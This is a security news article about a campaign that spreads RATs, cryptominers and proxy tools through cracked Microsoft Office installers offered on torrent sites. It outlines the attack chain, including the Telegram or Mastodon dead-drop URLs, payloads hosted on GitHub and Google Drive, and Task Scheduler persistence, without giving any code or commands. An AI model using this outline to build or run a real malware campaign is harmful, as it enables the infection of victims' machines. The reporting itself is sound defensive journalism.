Cracked MS Office launches malware strains on systems

Cybercriminals currently deploy various malware variants through cracked MS Office, which they advertise on torrent websites.

These threat actors distributed notable malware to baited customers, including remote access trojans  (RATs), cryptocurrency miners, malware downloaders, proxy tools, and AV software. These attacks led researchers to recognise the ongoing efforts of malicious entities and warn users about the dangers of installing unauthorised software.

Additionally, other researchers claim that the attackers employ a variety of lures, including Microsoft Office, Windows, and the Hangul Word Processor, which is popular in Korea.

 

These campaigns have been efficient as the threat actors have developed well-designed cracked MS Office products.

 

The cracked MS Office installer has a well-designed UI that allows users to choose the version they want to install, the language, and whether to use 32- or 64-bit versions.

However, the installer launches obfuscated [.]NET malware that contacts a Telegram or Mastodon channel to retrieve a valid download URL, which will discreetly download other components in the background. The URL refers to Google Drive or GitHub, both trustworthy sites unlikely to generate suspicions from AV alarms.

The base64 payloads uploaded on those platforms contain PowerShell commands that inject various malware strains into the system. These strains are unpacked using 7Zip, and the malware component ‘Updater’ registers tasks in the Windows Task Scheduler to ensure persistence despite reboots.

According to researchers, the cracked software could install malicious payloads on compromised systems, such as Orcus RAT, XMRig cryptominer, 3Proxy, PureCrypter, and AntiAV. Even if the user discovers and removes any malware, the ‘Updater’ module, which runs at system startup, will reintroduce it to the infected system.

Therefore, users should always be cautious when installing files downloaded from unknown or unverified sources and avoid pirated/cracked software since most of it is bait developed by malicious entities. Similar ads have been used to promote the STOP ransomware, the most active ransomware operation targeting consumers.

Because these files are not digitally signed and users are willing to disregard AV warnings when launching them, they are frequently used to infect systems with malware. Everyone should refrain from getting these products.